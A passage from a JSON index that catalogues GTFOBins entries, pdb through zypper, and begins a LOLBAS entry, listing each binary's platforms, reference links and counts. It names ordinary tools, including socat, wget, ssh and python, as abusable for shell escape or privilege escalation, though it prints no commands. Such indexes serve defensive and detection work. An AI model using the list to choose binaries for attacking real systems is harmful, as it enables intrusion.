erences":["https://gtfobins.github.io/gtfobins/pdb/"],"count":2},{"id":"gtfo:pdflatex","name":"pdflatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"count":9},{"id":"gtfo:pdftex","name":"pdftex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdftex/"],"count":3},{"id":"gtfo:perf","name":"perf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perf/"],"count":3},{"id":"gtfo:perl","name":"perl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perl/"],"count":14},{"id":"gtfo:perlbug","name":"perlbug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perlbug/"],"count":2},{"id":"gtfo:pexec","name":"pexec","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pexec/"],"count":3},{"id":"gtfo:pg","name":"pg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pg/"],"count":6},{"id":"gtfo:php","name":"php","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/php/"],"count":40},{"id":"gtfo:pic","name":"pic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pic/"],"count":6},{"id":"gtfo:pidstat","name":"pidstat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pidstat/"],"count":3},{"id":"gtfo:pip","name":"pip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pip/"],"count":4},{"id":"gtfo:pipx","name":"pipx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pipx/"],"count":2},{"id":"gtfo:pkexec","name":"pkexec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pkexec/"],"count":1},{"id":"gtfo:pkg","name":"pkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pkg/"],"count":1},{"id":"gtfo:plymouth","name":"plymouth","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/plymouth/"],"count":3},{"id":"gtfo:podman","name":"podman","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/podman/"],"count":2},{"id":"gtfo:poetry","name":"poetry","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/poetry/"],"count":2},{"id":"gtfo:posh","name":"posh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/posh/"],"count":2},{"id":"gtfo:pr","name":"pr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pr/"],"count":3},{"id":"gtfo:procmail","name":"procmail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/procmail/"],"count":2},{"id":"gtfo:pry","name":"pry","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pry/"],"count":2},{"id":"gtfo:psftp","name":"psftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/psftp/"],"count":3},{"id":"gtfo:psql","name":"psql","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/psql/"],"count":6},{"id":"gtfo:ptx","name":"ptx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ptx/"],"count":3},{"id":"gtfo:puppet","name":"puppet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/puppet/"],"count":6},{"id":"gtfo:pwsh","name":"pwsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pwsh/"],"count":4},{"id":"gtfo:pygmentize","name":"pygmentize","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pygmentize/"],"count":2},{"id":"gtfo:pyright","name":"pyright","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pyright/"],"count":6},{"id":"gtfo:python","name":"python","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/python/"],"count":26},{"id":"gtfo:qpdf","name":"qpdf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/qpdf/"],"count":3},{"id":"gtfo:rake","name":"rake","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rake/"],"count":4},{"id":"gtfo:ranger","name":"ranger","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ranger/"],"count":2},{"id":"gtfo:rc","name":"rc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rc/"],"count":3},{"id":"gtfo:readelf","name":"readelf","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/readelf/"],"count":3},{"id":"gtfo:redcarpet","name":"redcarpet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/redcarpet/"],"count":2},{"id":"gtfo:redis","name":"redis","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/redis/"],"count":3},{"id":"gtfo:restic","name":"restic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/restic/"],"count":15},{"id":"gtfo:rev","name":"rev","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rev/"],"count":3},{"id":"gtfo:rlogin","name":"rlogin","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rlogin/"],"count":3},{"id":"gtfo:rlwrap","name":"rlwrap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"count":6},{"id":"gtfo:rpm","name":"rpm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpm/"],"count":10},{"id":"gtfo:rpmdb","name":"rpmdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"count":6},{"id":"gtfo:rpmquery","name":"rpmquery","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"count":6},{"id":"gtfo:rpmverify","name":"rpmverify","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"count":6},{"id":"gtfo:rsync","name":"rsync","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rsync/"],"count":3},{"id":"gtfo:rsyslogd","name":"rsyslogd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rsyslogd/"],"count":1},{"id":"gtfo:rtorrent","name":"rtorrent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"count":3},{"id":"gtfo:ruby","name":"ruby","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ruby/"],"count":15},{"id":"gtfo:run-mailcap","name":"run-mailcap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"count":4},{"id":"gtfo:run-parts","name":"run-parts","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/run-parts/"],"count":6},{"id":"gtfo:runscript","name":"runscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/runscript/"],"count":3},{"id":"gtfo:rustc","name":"rustc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustc/"],"count":6},{"id":"gtfo:rustdoc","name":"rustdoc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"count":4},{"id":"gtfo:rustfmt","name":"rustfmt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustfmt/"],"count":2},{"id":"gtfo:rustup","name":"rustup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustup/"],"count":4},{"id":"gtfo:sash","name":"sash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sash/"],"count":3},{"id":"gtfo:scanmem","name":"scanmem","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scanmem/"],"count":3},{"id":"gtfo:scp","name":"scp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scp/"],"count":12},{"id":"gtfo:screen","name":"screen","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/screen/"],"count":6},{"id":"gtfo:script","name":"script","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/script/"],"count":6},{"id":"gtfo:scrot","name":"scrot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scrot/"],"count":3},{"id":"gtfo:sed","name":"sed","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sed/"],"count":12},{"id":"gtfo:service","name":"service","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/service/"],"count":2},{"id":"gtfo:setarch","name":"setarch","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setarch/"],"count":3},{"id":"gtfo:setcap","name":"setcap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setcap/"],"count":2},{"id":"gtfo:setfacl","name":"setfacl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setfacl/"],"count":2},{"id":"gtfo:setlock","name":"setlock","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setlock/"],"count":3},{"id":"gtfo:sftp","name":"sftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sftp/"],"count":9},{"id":"gtfo:sg","name":"sg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sg/"],"count":2},{"id":"gtfo:shred","name":"shred","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/shred/"],"count":3},{"id":"gtfo:shuf","name":"shuf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/shuf/"],"count":6},{"id":"gtfo:slsh","name":"slsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/slsh/"],"count":3},{"id":"gtfo:smbclient","name":"smbclient","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/smbclient/"],"count":6},{"id":"gtfo:snap","name":"snap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/snap/"],"count":1},{"id":"gtfo:socat","name":"socat","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/socat/"],"count":21},{"id":"gtfo:socket","name":"socket","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/socket/"],"count":6},{"id":"gtfo:soelim","name":"soelim","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/soelim/"],"count":3},{"id":"gtfo:softlimit","name":"softlimit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/softlimit/"],"count":3},{"id":"gtfo:sort","name":"sort","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sort/"],"count":6},{"id":"gtfo:split","name":"split","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/split/"],"count":9},{"id":"gtfo:sqlite3","name":"sqlite3","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"count":9},{"id":"gtfo:sqlmap","name":"sqlmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sqlmap/"],"count":2},{"id":"gtfo:ss","name":"ss","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ss/"],"count":3},{"id":"gtfo:ssh","name":"ssh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh/"],"count":16},{"id":"gtfo:ssh-agent","name":"ssh-agent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"count":3},{"id":"gtfo:ssh-copy-id","name":"ssh-copy-id","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"count":4},{"id":"gtfo:ssh-keygen","name":"ssh-keygen","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"count":3},{"id":"gtfo:ssh-keyscan","name":"ssh-keyscan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"count":3},{"id":"gtfo:sshfs","name":"sshfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshfs/"],"count":6},{"id":"gtfo:sshpass","name":"sshpass","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshpass/"],"count":3},{"id":"gtfo:sshuttle","name":"sshuttle","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshuttle/"],"count":1},{"id":"gtfo:start-stop-daemon","name":"start-stop-daemon","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"count":3},{"id":"gtfo:stdbuf","name":"stdbuf","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"count":3},{"id":"gtfo:strace","name":"strace","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/strace/"],"count":5},{"id":"gtfo:strings","name":"strings","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/strings/"],"count":3},{"id":"gtfo:su","name":"su","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/su/"],"count":1},{"id":"gtfo:sudo","name":"sudo","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sudo/"],"count":1},{"id":"gtfo:sysctl","name":"sysctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sysctl/"],"count":5},{"id":"gtfo:systemctl","name":"systemctl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemctl/"],"count":6},{"id":"gtfo:systemd-resolve","name":"systemd-resolve","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemd-resolve/"],"count":1},{"id":"gtfo:systemd-run","name":"systemd-run","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"count":3},{"id":"gtfo:tac","name":"tac","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tac/"],"count":3},{"id":"gtfo:tail","name":"tail","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tail/"],"count":3},{"id":"gtfo:tailscale","name":"tailscale","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tailscale/"],"count":1},{"id":"gtfo:tar","name":"tar","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tar/"],"count":21},{"id":"gtfo:task","name":"task","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/task/"],"count":3},{"id":"gtfo:taskset","name":"taskset","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/taskset/"],"count":2},{"id":"gtfo:tasksh","name":"tasksh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tasksh/"],"count":3},{"id":"gtfo:tbl","name":"tbl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tbl/"],"count":3},{"id":"gtfo:tclsh","name":"tclsh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tclsh/"],"count":10},{"id":"gtfo:tcpdump","name":"tcpdump","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"count":7},{"id":"gtfo:tcsh","name":"tcsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tcsh/"],"count":6},{"id":"gtfo:tdbtool","name":"tdbtool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"count":3},{"id":"gtfo:tee","name":"tee","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tee/"],"count":3},{"id":"gtfo:telnet","name":"telnet","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/telnet/"],"count":6},{"id":"gtfo:terraform","name":"terraform","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/terraform/"],"count":3},{"id":"gtfo:tex","name":"tex","source":"GTFOBins","platform":["Linux"],"aliases":["xetex"],"references":["https://gtfobins.github.io/gtfobins/tex/"],"count":3},{"id":"gtfo:tftp","name":"tftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tftp/"],"count":6},{"id":"gtfo:tic","name":"tic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tic/"],"count":3},{"id":"gtfo:time","name":"time","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/time/"],"count":3},{"id":"gtfo:timedatectl","name":"timedatectl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/timedatectl/"],"count":2},{"id":"gtfo:timeout","name":"timeout","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/timeout/"],"count":3},{"id":"gtfo:tmate","name":"tmate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tmate/"],"count":3},{"id":"gtfo:tmux","name":"tmux","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tmux/"],"count":9},{"id":"gtfo:top","name":"top","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/top/"],"count":2},{"id":"gtfo:torify","name":"torify","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/torify/"],"count":2},{"id":"gtfo:torsocks","name":"torsocks","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/torsocks/"],"count":2},{"id":"gtfo:troff","name":"troff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/troff/"],"count":3},{"id":"gtfo:tsc","name":"tsc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tsc/"],"count":4},{"id":"gtfo:tshark","name":"tshark","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tshark/"],"count":2},{"id":"gtfo:ul","name":"ul","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ul/"],"count":3},{"id":"gtfo:unexpand","name":"unexpand","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unexpand/"],"count":3},{"id":"gtfo:uniq","name":"uniq","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uniq/"],"count":3},{"id":"gtfo:unshare","name":"unshare","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unshare/"],"count":3},{"id":"gtfo:unsquashfs","name":"unsquashfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unsquashfs/"],"count":2},{"id":"gtfo:unzip","name":"unzip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unzip/"],"count":2},{"id":"gtfo:update-alternatives","name":"update-alternatives","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/update-alternatives/"],"count":2},{"id":"gtfo:urlget","name":"urlget","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/urlget/"],"count":3},{"id":"gtfo:uuencode","name":"uuencode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uuencode/"],"count":3},{"id":"gtfo:uv","name":"uv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uv/"],"count":2},{"id":"gtfo:vagrant","name":"vagrant","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vagrant/"],"count":2},{"id":"gtfo:valgrind","name":"valgrind","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/valgrind/"],"count":2},{"id":"gtfo:varnishncsa","name":"varnishncsa","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/varnishncsa/"],"count":2},{"id":"gtfo:vi","name":"vi","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vi/"],"count":18},{"id":"gtfo:vigr","name":"vigr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vigr/"],"count":2},{"id":"gtfo:vim","name":"vim","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["nvim","rvim","view","vimdiff"],"references":["https://gtfobins.github.io/gtfobins/vim/"],"count":12},{"id":"gtfo:vipw","name":"vipw","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vipw/"],"count":2},{"id":"gtfo:virsh","name":"virsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/virsh/"],"count":5},{"id":"gtfo:volatility","name":"volatility","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/volatility/"],"count":3},{"id":"gtfo:w3m","name":"w3m","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/w3m/"],"count":3},{"id":"gtfo:wall","name":"wall","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wall/"],"count":1},{"id":"gtfo:watch","name":"watch","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/watch/"],"count":6},{"id":"gtfo:wc","name":"wc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wc/"],"count":3},{"id":"gtfo:wg-quick","name":"wg-quick","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wg-quick/"],"count":1},{"id":"gtfo:wget","name":"wget","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wget/"],"count":18},{"id":"gtfo:whiptail","name":"whiptail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/whiptail/"],"count":3},{"id":"gtfo:whois","name":"whois","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/whois/"],"count":6},{"id":"gtfo:wireshark","name":"wireshark","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wireshark/"],"count":4},{"id":"gtfo:wish","name":"wish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wish/"],"count":3},{"id":"gtfo:xargs","name":"xargs","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xargs/"],"count":12},{"id":"gtfo:xdg-user-dir","name":"xdg-user-dir","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"],"count":2},{"id":"gtfo:xdotool","name":"xdotool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xdotool/"],"count":3},{"id":"gtfo:xmodmap","name":"xmodmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"count":3},{"id":"gtfo:xmore","name":"xmore","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xmore/"],"count":3},{"id":"gtfo:xpad","name":"xpad","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xpad/"],"count":3},{"id":"gtfo:xxd","name":"xxd","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xxd/"],"count":6},{"id":"gtfo:xz","name":"xz","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xz/"],"count":3},{"id":"gtfo:yarn","name":"yarn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yarn/"],"count":6},{"id":"gtfo:yash","name":"yash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yash/"],"count":3},{"id":"gtfo:yelp","name":"yelp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yelp/"],"count":2},{"id":"gtfo:yt-dlp","name":"yt-dlp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yt-dlp/"],"count":2},{"id":"gtfo:yum","name":"yum","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yum/"],"count":3},{"id":"gtfo:zathura","name":"zathura","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zathura/"],"count":2},{"id":"gtfo:zcat","name":"zcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zcat/"],"count":2},{"id":"gtfo:zgrep","name":"zgrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zgrep/"],"count":2},{"id":"gtfo:zic","name":"zic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zic/"],"count":3},{"id":"gtfo:zip","name":"zip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zip/"],"count":6},{"id":"gtfo:zless","name":"zless","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zless/"],"count":3},{"id":"gtfo:zsh","name":"zsh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zsh/"],"count":24},{"id":"gtfo:zsoelim","name":"zsoelim","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"count":3},{"id":"gtfo:zypper","name":"zypper","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zypper/"],"count":4},{"id":"lolbas:addinutil-exe","name":"AddinUtil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.